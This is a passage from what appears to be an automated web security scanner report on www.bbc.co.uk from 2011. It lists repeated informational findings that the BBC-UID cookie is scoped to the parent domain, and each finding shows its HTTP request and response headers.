The following cookie was issued by the application and is scoped to a parent of the issuing domain: BBC-UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:40 GMT
Location: http://www.bbc.co.uk/news/world-us-canada-12411274
Keep-Alive: timeout=4, max=191
Connection: close
Set-Cookie: BBC-UID=b4bd3545fefae4509ff12002b17db3040da33c4150f09134440fc907add6e15f0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 234

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-us-canada-12411
...[SNIP]...

2.37. http://www.bbc.co.uk/news/business-12434447

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.38. http://www.bbc.co.uk/news/business-12434453

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=702
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.39. http://www.bbc.co.uk/news/business-12435838

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=728
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.40. http://www.bbc.co.uk/news/business-12437194

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=788
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.41. http://www.bbc.co.uk/news/education-12429152

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=765
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.42. http://www.bbc.co.uk/news/entertainment-arts-12426999

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=755
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.43. http://www.bbc.co.uk/news/entertainment-arts-12427905

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.44. http://www.bbc.co.uk/news/entertainment-arts-12428196

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.45. http://www.bbc.co.uk/news/health-12401970

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/health-12401970 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=764
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.46. http://www.bbc.co.uk/news/health-12409700

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:45 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:02:45 GMT
Connection: close
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.47. http://www.bbc.co.uk/news/health-12415801

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:46 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:02:46 GMT
Connection: close
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.48. http://www.bbc.co.uk/news/magazine-12392811

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.49. http://www.bbc.co.uk/news/magazine-12418046

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=636
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.50. http://www.bbc.co.uk/news/magazine-12428754

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:48 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:48 GMT
Connection: close
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.51. http://www.bbc.co.uk/news/magazine-12428759

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:49 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:49 GMT
Connection: close
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.52. http://www.bbc.co.uk/news/science-environment-12412662

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:50 GMT
Keep-Alive: timeout=10, max=754
Expires: Sat, 12 Feb 2011 02:02:50 GMT
Connection: close
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.53. http://www.bbc.co.uk/news/science-environment-12417858

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BBC-UID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=798
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
